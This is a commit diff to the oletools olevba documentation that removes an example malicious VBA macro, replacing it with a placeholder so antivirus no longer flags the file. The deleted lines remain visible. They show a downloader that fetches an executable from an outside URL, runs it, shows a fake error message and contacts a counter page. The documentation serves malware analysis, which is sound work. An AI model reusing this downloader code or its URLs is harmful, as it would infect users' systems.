Commit 41d98ad562d0db71e23f0c669b2776271fde10a0
1 parent
aaa7c73f
olevba: removed malicious code from documentation to avoid triggering antivirus
Showing
1 changed file
with
2 additions
and
12 deletions
oletools/doc/olevba.md
| ... | ... | @@ -157,20 +157,10 @@ For example, checking the malware sample [DIAN_caso-5415.doc](https://malwr.com/ |
| 157 | 157 | SNVJYQ |
| 158 | 158 | End Sub |
| 159 | 159 | Public Sub SNVJYQ() |
| 160 | - OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero. | |
| 161 | - exe" | |
| 160 | + [Malicious Code...] | |
| 162 | 161 | End Sub |
| 163 | 162 | Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean |
| 164 | - Dim HRKUYU, lala As Long | |
| 165 | - HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0) | |
| 166 | - If HRKUYU = 0 Then OGEXYR = True | |
| 167 | - Dim YKPZZS | |
| 168 | - YKPZZS = Shell(PHHWIV, 1) | |
| 169 | - MsgBox "El contenido de este documento no es compatible con este equipo." & | |
| 170 | - vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no | |
| 171 | - compatible" | |
| 172 | - lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Envi | |
| 173 | - ron("TMP") & "\lkjljlljk", 0, 0) | |
| 163 | + [Malicious Code...] | |
| 174 | 164 | Application.DisplayAlerts = False |
| 175 | 165 | Application.Quit |
| 176 | 166 | End Function | ... | ... |